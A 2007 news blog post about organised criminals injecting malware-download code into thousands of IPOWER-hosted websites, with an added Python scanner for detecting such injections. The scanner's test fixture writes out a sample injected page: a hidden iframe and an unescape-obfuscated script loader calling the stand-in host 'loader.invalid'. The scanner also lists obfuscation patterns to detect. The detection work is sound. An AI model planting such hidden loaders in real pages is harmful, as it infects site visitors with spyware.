Cyber Crooks Hijack Activities of Large Web-Hosting Firm
Organized crime groups have modified a significant share of the Web sites operated by one of the Internet's largest Web hosting companies to launch cyber attacks against visitors, Security Fix has learned.
Last month, Phoenix-based IPOWER Inc. was featured prominently in an unflattering report by StopBadware.org, a joint effort by Google, Harvard Law School's Berkman Center for Internet & Society and Oxford University's Internet Institute. StopBadware has identified more than 90,000 sites that attempt to install malicious software on visitors' computers, either by exploiting browser security holes or through programming tricks. When a user clicks on one of these sites in Google search results, Google posts a warning page stating that the site has been spotted trying to attack previous visitors.
John Palfrey, a professor of Internet law at Harvard, said the report showed that about 90 percent of the sites flagged as serving "badware" appeared to be otherwise legitimate sites that had been hijacked by criminals.
"What we've seen is a growing and alarming trend where the majority of sites we're identifying [belong to individuals] who clearly have no intention of distributing badware," Palfrey said.
StopBadware found that about 10 percent of the sites in its database were operated by IPOWER. Security Fix found that the problem at IPOWER may be far worse than StopBadware indicated.
Like many other companies that offer low-cost Web site hosting services for about $5 to $10 per month, IPOWER hosts sites via "virtual servers." This allows multiple sites to be hosted using the same hardware. Virtual server setups are far more affordable than "dedicated" hosting services, where each Web site is assigned its own set of hardware.
Security Fix examined nine of IPOWER's virtual servers. They are identified in the chart to the left by the names assigned to them by IPOWER -- "CPanel1" through "CPanel8" and "Host16". These servers are home to at least 8,192 active Web sites, most of which appear to belong to individuals and small businesses. According to a Security Fix analysis, more than 2,650 of those sites -- or an average of 33 percent of all sites on each server -- included computer code designed to silently retrieve malicious software from a variety of online locations. Some of the download sites linked to in the unauthorized code were inactive at press time, while others were able to serve malicious software to visitors, most often in the form of spyware that steals passwords and financial data from a victim's PC.
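As an added illustration, not part of the original Security Fix report or any code from IPOWER or StopBadware, the following Python script shows the kind of sweep a hosting provider could run over a shared server's web roots to spot the indicators described above: hidden or zero-size iframes, script tags that pull from hosts other than the customer's own domain, and inline JavaScript that decodes and writes a loader at run time. The sample pages, file names and the "loader.invalid" host are constructed for the example.

```python
"""Sweep HTML pages for code that silently pulls content from third-party hosts.

Added example for this article, not code from IPOWER, StopBadware or Security Fix.
Indicators: hidden or zero-size iframes, script tags loading from hosts other than
the site's own, and inline JavaScript that decodes/evaluates an escaped payload.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Calls commonly used to hide a loader URL inside an inline script.
OBFUSCATION = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(", re.I)


class _RefCollector(HTMLParser):
    """Collect iframes, external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # attribute dicts of every <iframe>
        self.scripts = []      # src values of <script src=...>
        self.inline_js = []    # one string per inline <script> element
        self._buf = None       # body of the inline script being read

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script":
            if "src" in a:
                self.scripts.append(a["src"])
            else:
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline_js.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 pixel."""
    return value.strip().lower().rstrip("px") in ("0", "1")


def _is_hidden(attrs):
    """True when an iframe is styled or sized so the visitor never sees it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", "")))


def _external(url, site_host):
    """True when url names a host other than the customer's own site."""
    host = urlparse(url).hostname
    return host is not None and host.lower() != site_host.lower()


def scan_html(html, site_host):
    """Return [(indicator, detail), ...] for one page; empty list if clean."""
    p = _RefCollector()
    p.feed(html)
    p.close()
    findings = []
    for f in p.iframes:
        src = f.get("src", "")
        if src and _is_hidden(f):
            findings.append(("hidden_iframe", src))
        elif src and _external(src, site_host):
            findings.append(("external_iframe", src))
    for src in p.scripts:
        if _external(src, site_host):
            findings.append(("external_script", src))
    for body in p.inline_js:
        if OBFUSCATION.search(body):
            findings.append(("obfuscated_script", body.strip()[:60]))
    return findings


def sweep(pages, site_host):
    """pages: {filename: html}. Returns {filename: findings} for pages with hits."""
    report = {}
    for name, html in pages.items():
        findings = scan_html(html, site_host)
        if findings:
            report[name] = findings
    return report


# Constructed sample pages; "loader.invalid" is a placeholder, not a real host.
CLEAN_PAGE = """<html><body><h1>DJ Andy</h1>
<script src="/js/menu.js"></script>
<a href="http://www.example.com/gigs">Gigs</a></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>",
    '<iframe src="http://loader.invalid/in.cgi?3" width=0 height=0 '
    'style="display:none"></iframe>'
    '<script>document.write(unescape("%3Cscript src=%27http://loader.invalid/'
    'x.js%27%3E%3C/script%3E"))</script></body>')

if __name__ == "__main__":
    site = {"index.html": CLEAN_PAGE, "about.html": INJECTED_PAGE}
    for name, hits in sweep(site, "www.example.com").items():
        for kind, detail in hits:
            print(f"{name}: {kind}: {detail}")
```

The parser deliberately keys on structure rather than on a blocklist of known bad hosts: as the article notes below, the download sites behind this kind of code go up and down constantly, so a sweep that only matched the two or three currently active hosts would miss the next rotation. A real deployment would walk each customer's document root and pass the account's own hostname as `site_host`.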
IPOWER declined a phone interview for this story. But the company acknowledged in an e-mail that "over the past three months our servers were targeted. We take this situation very seriously and a diligent cleanup effort has been underway for many months already. We saw the StopBadware report on the day it came out and went to download the list to sweep it as quickly as possible. By looking at the list, it was evident that our cleanup efforts were already helping significantly. By the time we downloaded the list, there were already over a few thousand accounts less than what they claimed in their report."
IPOWER said the site hacks "came from a compromised server hosted by another company that was listed on the Stopbadware.org Web site. This impacted a higher percentage of accounts on each of these legacy third-party control panel systems."
The company claims to have more than 700,000 customers. If we assume for the moment that the small sample of IPOWER servers Security Fix analyzed is representative of the company as a whole, IPOWER may well be home to nearly a quarter-million compromised Web sites.
Andy Gravina, a deejay from central Florida, first learned his site was infected three months ago when his anti-virus program alerted him that his own home page was trying to infect his computer with a virus.
Gravina said he contacted IPOWER about the malicious code. He said the company told him that it was his responsibility to maintain the security and integrity of his site.
"I said, 'Wait a minute, this Web page is housed on your servers, and it would seem you would have the responsibility to see that your servers are being checked with anti-virus programs,'" Gravina recalled. "So the guy put me on hold and after a while he came back and said that the pages had been checked and that the offending code had been removed."
Gravina said he thought the problem had been taken care of, until he received a call from Security Fix notifying him that his site continued to host the malicious code.
While two of the malicious sites most commonly referenced by the compromised IPOWER servers were offline at the time of this publication, remote sites used to serve malicious software frequently go up and down as the attackers modify their operations, said Roger Thompson, chief research officer at Exploit Prevention Labs.
IPOWER declined to say exactly how the attackers infiltrated so many of its servers, or how long the malicious code has resided on infected sites.
"We are constantly responding and developing new measures to counter attacks and compromises from various off-shore hacking groups," the company said. "There are new attacks created from new sources every day. We can't control that. We can control how we handle them, and we are very proactive."
But a review of Gravina's and McGovern's sites indicates that both virtual servers are running outdated, insecure versions of the Apache Web server software and PHP, a popular Web scripting language that many hosting companies provide for their customers.
The most recent version of PHP, 4.4.7, includes fixes for more than five dozen security holes found since PHP 4.4.2, the version IPOWER is running, which was first released nearly 16 months ago.
Large hosting providers should not be allowed to host tens of thousands of compromised sites for months at a time. There is little excuse for failing to apply long-overdue security updates to seal frequently targeted Web server software flaws, and no reason why hosting providers cannot keep closer tabs on the content being served by their customers.
Under the Digital Millennium Copyright Act, an Internet service provider or Web host that receives a copyright "takedown notice" will generally act within about 48 hours: the law shields network owners from infringement liability only if they promptly remove the infringing content. Yet ISPs and Web hosts often leave sites that are being used to steal financial data and consumer identities undisturbed for months.
There is no "notice and takedown" law specifically requiring ISPs and Web hosts to police their networks for sites that may serve malicious software. Security Fix readers - do you think that such a law would be useful or effective?
Service providers might get better control of malicious activity on their networks if they made a more concerted effort to triage abuse reports by type. Most ISPs and Web hosts publish a single e-mail address for reporting suspicious, hostile or illegal behavior, usually the standard "abuse@" mailbox at the provider's domain. Consider the technicians who have to sift through that one inbox for the truly serious reports: spam complaints will almost certainly be the most numerous, followed by complaints about phishing and unauthorized network scanning. One way to shorten response times would be to route phishing reports to one dedicated address and reports of malicious software to another, separate from the general abuse inbox.
Update, 1:56 PM ET: A reader just alerted me to the inaugural post of Google's new Online Security Blog, which delves into the problem of hacked, legitimate sites serving up malicious software.
May 23, 2007; 10:30 AM ET
Categories: Fraud , From the Bunker , Latest Warnings , Safety Tips